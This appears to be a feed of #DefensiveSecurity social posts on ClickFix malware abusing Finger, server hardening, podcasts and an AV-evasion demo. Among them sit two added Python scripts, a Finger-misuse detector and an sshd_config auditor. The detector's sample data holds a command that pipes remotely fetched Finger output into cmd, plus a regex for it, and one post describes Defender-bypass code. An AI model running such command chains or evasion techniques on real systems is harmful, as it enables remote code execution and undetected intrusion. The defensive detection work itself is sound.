#DefensiveSecurity

2025-12-18

The Mire is a defensive security system that shifts the economics of attack. Clients that ignore server directives are treated as hostile and met with cost and confusion—wasting time, compute, and analysis while serving convincingly real noise. #infosec #defensivesecurity

mire.cc/welcome-to-the-mire/

A vision of a rock festival afterwards, after it rained for days....
2025-12-03

podverse.fm/episode/S224ePoTN Great episode of the #defensivesecurity podcast. No, I’m not advertising Podverse; it’s just what I use.

2025-11-17

The decades-old Finger protocol is being abused in new ClickFix malware campaigns. Attackers are using Finger to pull remote commands onto Windows systems, leading to Python-based malware or NetSupport RAT infections. Newer variants even check for analysis tools before execution.

Anyone else seeing Finger traffic or legacy protocol misuse recently?
Follow for more updates.

#Malware #ClickFix #InfoSec #ThreatIntel #WindowsSecurity #CyberSecurity #RAT #LegacyProtocols #DefensiveSecurity

Decades-old ‘Finger’ protocol abused in ClickFix malware attacks
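Detection logic for the behaviour described in this post, as an added editorial example (it is not from the post, the linked article, or any vendor's rule set): it flags any finger.exe launch on a server, escalates when the parent shell pipes finger's output onward, and flags outbound TCP/79 from anything not explicitly allowed. The event fields, the piped-command shape and the sample telemetry are assumptions, loosely modelled on Sysmon process-creation (event 1) and network-connection (event 3) records.

```python
"""Flag Finger (TCP/79) misuse in endpoint telemetry.

Added editorial example, not from the post above or any vendor's
detection content. The events below are constructed sample telemetry;
field names are assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

FINGER_PORT = 79

# Assumption: images allowed to talk to TCP/79 (e.g. an inventory script
# on a legacy host). Empty by default: nothing is expected to use it.
ALLOWED_FINGER_CLIENTS: set[str] = set()

# finger's output being piped into another command. Assumed shape of a
# "finger pulls commands" chain; adjust to what your own telemetry shows.
_PIPED = re.compile(r"finger(?:\.exe)?\b[^|]*\|", re.IGNORECASE)


@dataclass
class Event:
    kind: str                 # "process" or "network"
    image: str                # full path of the executable
    cmdline: str = ""         # the process's own command line
    parent_cmdline: str = ""  # command line of the parent process
    dst_port: int = 0         # destination port for network events


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: Event) -> str | None:
    """Return a finding label for one event, or None if it is benign."""
    image = _basename(ev.image)
    if ev.kind == "process" and image == "finger.exe":
        # Any finger.exe launch on a server is worth a ticket; output being
        # piped onward by the parent shell is the higher-severity case.
        if _PIPED.search(ev.parent_cmdline):
            return "finger_output_piped_to_shell"
        return "finger_execution"
    if (ev.kind == "network" and ev.dst_port == FINGER_PORT
            and image not in ALLOWED_FINGER_CLIENTS):
        # Port 79 has no business purpose on a modern estate.
        return "outbound_finger_port"
    return None


def scan(events: list[Event]) -> list[tuple[int, str]]:
    """Run classify() over a batch; returns (index, label) pairs."""
    return [(i, label) for i, ev in enumerate(events)
            if (label := classify(ev)) is not None]


# Constructed sample telemetry (203.0.113.0/24 is a documentation range).
SAMPLE_EVENTS = [
    Event("process", r"C:\Windows\System32\finger.exe",
          cmdline="finger admin@203.0.113.5",
          parent_cmdline='cmd.exe /c "finger admin@203.0.113.5 | cmd"'),
    Event("network", r"C:\Windows\System32\finger.exe", dst_port=FINGER_PORT),
    Event("process", r"C:\Windows\System32\notepad.exe", cmdline="notepad.exe"),
    Event("network", r"C:\Program Files\Mozilla Firefox\firefox.exe", dst_port=443),
]

if __name__ == "__main__":
    for idx, label in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {label} ({SAMPLE_EVENTS[idx].image})")
```

The process check keys on the image name rather than the command line because finger.exe's own command line only ever shows the target; the pipe lives in the parent's command line, which is why the example carries `parent_cmdline` separately.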
2025-10-24

Attackers are targeting Azure Blob Storage in complex multi-stage campaigns — reminding us that cloud data needs active defense, not blind trust. ☁️🛡️ #CloudSecurity #DefensiveSecurity

microsoft.com/en-us/security/b

2025-09-29

Lobot: Cyborg responsible for systems and operations with unclear motives and allegiances.
Atom Eins: Cyborg responsible for systems and operations with unclear motives and allegiances.
Jerry Bell (@jerry): ...

#AlienEarth #StarWars #EmpireStrikesBack #DefensiveSecurity

Image of character Lobot played by John Hollis from the movie "Star Wars: The Empire Strikes Back".
A stern-looking bald white man with a heroic nose is shown in partial light. He is wearing a dark tunic over a pale shirt and has electronic devices attached to his ears.

Image of character Atom Eins played by Adrian Edmondson from the TV series "Alien Earth".
A stern-looking bald white man with a heroic nose is shown in partial light. He is wearing a dark suit, white shirt and dark tie.

Image of character Jerry Bell played by Jerry Bell from the podcast "Defensive Security".
A stern-looking bald white man with a heroic nose is shown in partial light. He is wearing a salmon shirt and has electronic devices attached to his ears.
2025-09-25

📋 Server Security Checklist — Essential Hardening Guide 🛡️

Securing servers is critical to protect sensitive data, applications, and networks. Here’s a quick checklist every sysadmin and security engineer should follow to reduce risk and strengthen resilience. ⚡🔐

1️⃣ System & OS Hardening
🔹 Keep OS and packages updated (apply patches regularly).
🔹 Remove or disable unused services & software.
🔹 Configure secure boot and BIOS/UEFI passwords.

2️⃣ Access Control
🔹 Enforce strong passwords + MFA for all accounts.
🔹 Use role-based access (least privilege).
🔹 Disable root/administrator login over SSH/RDP.

3️⃣ Network Security
🔹 Restrict inbound/outbound traffic with firewalls.
🔹 Segment critical servers from general networks.
🔹 Disable unused ports & protocols.

4️⃣ Secure Remote Access
🔹 Use SSH with key-based auth (disable password logins).
🔹 Enforce VPNs for admin access.
🔹 Monitor and log remote sessions.

5️⃣ Logging & Monitoring
🔹 Enable centralized logging (syslog/SIEM).
🔹 Monitor failed login attempts & unusual activity.
🔹 Configure alerts for critical events.

6️⃣ Data Protection
🔹 Encrypt sensitive data at rest & in transit (TLS, disk encryption).
🔹 Regularly back up data to secure, offline storage.
🔹 Apply strict database access policies.

7️⃣ Application & Patch Management
🔹 Keep middleware, frameworks, and apps patched.
🔹 Remove default credentials and sample configs.
🔹 Use secure coding practices.

8️⃣ Malware & Intrusion Defense
🔹 Deploy antivirus/EDR for endpoints.
🔹 Enable IDS/IPS at the network edge.
🔹 Scan regularly for vulnerabilities.

9️⃣ Physical & Cloud Security
🔹 Restrict physical access to server rooms.
🔹 Harden cloud instances with provider tools (security groups, IAM).
🔹 Regularly review cloud audit logs.

🔟 Policy & Compliance
🔹 Apply CIS/NIST benchmarks.
🔹 Document access, configs, and changes.
🔹 Train admins in security best practices.

#ServerSecurity #CyberSecurity #InfoSec #BlueTeam #SysAdmin #ITSecurity #SecurityChecklist #DefensiveSecurity
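An audit script for the "Access Control" and "Secure Remote Access" items above (root login disabled, password logins disabled, key-based auth on), as an added editorial example that is not part of the checklist post. It models three sshd behaviours that routinely defeat a quick visual review: keywords are case-insensitive, the first value of a keyword wins and later duplicates are silently ignored, and anything under a Match block applies only to matching connections. The two config texts at the bottom are constructed; the defaults table reflects OpenSSH 7.0 and later.

```python
"""Audit sshd_config against the remote-access items of the checklist.

Added editorial example, not part of the post above. The configs at the
bottom are constructed. Modelled sshd behaviours: keywords are
case-insensitive, the FIRST value of a keyword wins, and settings under
a Match block apply only to matching connections.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# "Key value", "Key=value" and "Key = value" are all accepted by sshd.
_LINE = re.compile(r"^(\S+?)\s*(?:=|\s)\s*(.*?)\s*$")

# Effective defaults when a keyword is absent (OpenSSH 7.0 and later).
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
    "permitemptypasswords": "no",
}
# What the checklist asks for in the global section.
WANT = {
    "permitrootlogin": "no",
    "passwordauthentication": "no",
    "pubkeyauthentication": "yes",
    "permitemptypasswords": "no",
}
PRETTY = {
    "permitrootlogin": "PermitRootLogin",
    "passwordauthentication": "PasswordAuthentication",
    "pubkeyauthentication": "PubkeyAuthentication",
    "permitemptypasswords": "PermitEmptyPasswords",
}


@dataclass
class SshdConfig:
    top: dict[str, str] = field(default_factory=dict)                # first value wins
    ignored: list[tuple[str, str]] = field(default_factory=list)     # later duplicates
    matches: list[tuple[str, str, str]] = field(default_factory=list)  # (spec, key, value)


def parse_sshd_config(text: str) -> SshdConfig:
    cfg = SshdConfig()
    current_match: str | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _LINE.match(line)
        if not m or not m.group(2):
            continue
        key, value = m.group(1).lower(), m.group(2)
        if key == "match":
            current_match = value               # everything below is conditional
        elif current_match is not None:
            cfg.matches.append((current_match, key, value))
        elif key in cfg.top:
            cfg.ignored.append((key, value))    # sshd keeps the first one
        else:
            cfg.top[key] = value
    return cfg


def audit(text: str) -> list[str]:
    """Return human-readable findings; an empty list means all checks pass."""
    cfg = parse_sshd_config(text)
    findings: list[str] = []
    for key, want in WANT.items():
        have = cfg.top.get(key, DEFAULTS[key]).lower()
        if have != want:
            how = "set" if key in cfg.top else "defaulted"
            findings.append(f"{PRETTY[key]} {how} to '{have}', checklist wants '{want}'")
    for key, value in cfg.ignored:
        if key in WANT:
            findings.append(f"later '{PRETTY[key]} {value}' is ignored: "
                            f"sshd keeps the first value, '{cfg.top[key]}'")
    for spec, key, value in cfg.matches:
        if key in WANT and value.lower() != WANT[key]:
            findings.append(f"Match '{spec}' sets {PRETTY[key]} {value} "
                            f"for matching connections")
    return findings


# Constructed sample: reads as hardened at a glance, but is not.
WEAK_CONFIG = """\
Port 22
PermitRootLogin yes
PasswordAuthentication no
PubkeyAuthentication yes
# the duplicate below never takes effect
PermitRootLogin no
Match Address 203.0.113.0/24
    PasswordAuthentication yes
"""

HARDENED_CONFIG = """\
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
PermitEmptyPasswords no
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{name}: {audit(text) or ['ok']}")
```

On a live host, feed it the output of `sshd -T`, which prints the effective global configuration with lowercase keywords (the parser accepts that format as-is), and use `sshd -T -C user=...,host=...,addr=...` to see what the Match blocks resolve to for a particular connection.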

2025-07-17

A HUGE thank you to Mental Health Hacker's first PLATINUM sponsor, @blumirasec

This will enable us to bring even MORE to the @blueteamvillage
this year! Our partnership with BTV will enable us to help bring resources, content, and giveaways at @defcon this year! See y'all soon!!

A Security Tool Your IT Team Can Actually Use

Blumira simplifies cybersecurity by combining ease of use with powerful protection. We enable teams big and small to defend effectively.

#defcon #defcon33 #blueteam #defensivesecurity #siem #mentalhealth

Blumira, Users Love Us

Stats on Stats Podcast statsonstatspodcast
2025-01-27

🚨 Giveaway Alert: 3 LetsDefend VIP+ Vouchers for 1 Month Access! 🚨

We’re giving away 3 LetsDefend VIP+ vouchers for a free 1-month subscription on 02/01.

What You Need to Do:

1️⃣ Join our Discord Community (buff.ly/3Cfy9rT).

Mr Alexandre J-S William ELISÉ mralexandrelise@joomla.social
2024-12-19

Joomla Web Services WITHOUT Super User. Least Privilege Principle. One of the fundamentals of Information Security.
apiadept.com/technical/joomla-
#acl #cybersecurity #blueteam #defensivesecurity #leastprivilegeprinciple #defenseindepth #joomla #developer

2024-12-09

@lerg @jerry
Listening to this week's #DefensiveSecurity podcast.
EDIT: After seeing the post, I'm guessing it was last week's podcast. 😅

Re: the discussion around the CI/CD hack, Francois Proulx and @becojo delivered a presentation on this very thing at @NorthSec earlier this year: nsec.io/session/2024-under-the

From my own discussions with the two of them it sounded like that kind of compromise will leak any secrets exposed to the build processes, and some of that depends on what security features are enabled on a given repository.

Interesting to see that being exploited in the wild.

2024-12-04

Listening to @jerry on the most recent #DefensiveSecurity podcast. Specifically the point about how nobody really paid attention to border firewalls and then suddenly they did.

My pentest experience has mostly revealed an ugly truth: 99% of the time, any given piece of software which doesn't have a ton of CVEs reported for it isn't because it's secure, it's because nobody's looked.

Better education is key but I see a lot of colleges and universities taking the completely ass backwards approach. Instead of teaching every single developer how to securely code, they've spun up Cyber programs to chase those dollars. From an academic perspective it's a completely disappointing letdown.

2024-11-28

It took until the Second Edition, but now the audiobook version of The Defensive Security Handbook has been released!!

Share with your friends, your co-workers, your leadership, family that you kind of like, etc

audible.com/pd/Defensive-Secur

#newrelease #secondedition #defensivesecurity #infosec #audiobook #cybersecurity

Riding the AI Waves: The Rise of Artificial Intelligence to Combat Cyber Threats
thehackernews.com/2024/01/ridi #cybersecurity #AI #defensivesecurity

Damon Mohammadbagher ✅ DamonMohammadbagher@infosec.exchange
2023-09-15

SliverC2 test + old code which still works...
This C# code dates from 2019-2020 and I talked about it in my ebook "Bypassing AVs by C#.NET Programming v1.0" (published 2016 to 2020, free), but the code still works against Windows Defender (update 2023/08/28). I changed the code a little bit, as you can see in the video: VirtualProtectEx was added to change RWX to X...

But in this new test, as you can see, "Sliver-C2" (which I still think is much better than Cobalt Strike) changed the X protection mode to RW "in-memory" by itself (not by my code). Yeah, Sliver-C2 did it, and this will help you as a pentester/red teamer to bypass almost all AVs, and you as a blue teamer should learn how attackers will bypass your defensive tools with these simple/advanced techniques... These things are very important for defenders, and in my new ebook "Bypassing AVs by C# Programming v2.0" I will talk about them for defenders/blue teamers and also #redteamers, #pentesters, #SecurityResearchers etc.

By the way, this code is old and available on my GitHub for ebook v1.0.
You can also see the Cobalt Strike test video here: lnkd.in/eCyxjN6m

#blueteam #pentester #redteam #offensivesecurity #defensivesecurity #ebook #av #protectionmode #inmemory #sliverc2

Damon Mohammadbagher ✅ DamonMohammadbagher@infosec.exchange
2023-06-14

A new update of the code, ETWPM2Monitor2.1, is now ready after days of working on this (some bugs fixed), and I will publish this new version soon [after a little bit of new code ;D]. It is almost ready; as you can see, Ekko is detected via the extended memory scanners... and all these logs will be saved in the Windows event log too and added to the System/Detection logs tab...

This tool was created in 2021, and after two years it is now better than before but still has some bugs ;D. It is better than before because of some external code and memory scanners made by others, so I should say thanks to all blue team developers and red team developers for helping me make this project, ETWPM2Monitor2.1...

Note: a new memory scanner [Hunt-Sleeping-Beacons] has been added to my #blueteam tool "#ETWPM2Monitor2" v2.1, and the test was good, but it still needs some new code to be better than this; the code is almost ready now. My tool has a new #memoryscanner for #detecting #Sleepmasking and #Delay of code for #Beacons etc.

This tool really needed something like this to cover the gap in detection... This new scanner will scan processes every 60 seconds, but in the future I will add some smarter code to detect processes better than this and... In this case the new scanner was working independently, and even without starting ETWProcessMon2.exe this scanner will work in ETWPM2Monitor2.1; as you know, ETWPM2Monitor2.1 needs to work with #ETW #events via [running ETWProcessMon2.exe] etc.

#blueteam #pentesting #pentest #redteam #defender #defensivesecurity #defensive #defensivetools #monitoring #huntbeacons #beacons #cobaltstrike #soc #threatdetection #threathunting

Arthur Lutz (Zenika) arthurzenika@pouet.chapril.org
2023-04-20

#KubeCon #KubeConEU

attending

🛡 Kubernetes Defensive Monitoring with Prometheus - David de Torres Huerta & Mirco De Zorzi, Sysdig

#monitoring #devsecops #defensivesecurity

2023-03-15

#Kali #Linux 2023.1 Release ( #KaliPurple & Python Changes) | Kali Linux Blog

Over the years, we have perfected what we have specialized in, offensive #security. We are now starting to branch into a new area, defensive security! We are doing an initial technical preview pre-launch of “Kali Purple”. This is still in its infancy and is going to need time to mature.
#DefensiveSecurity

kali.org/blog/kali-linux-2023-
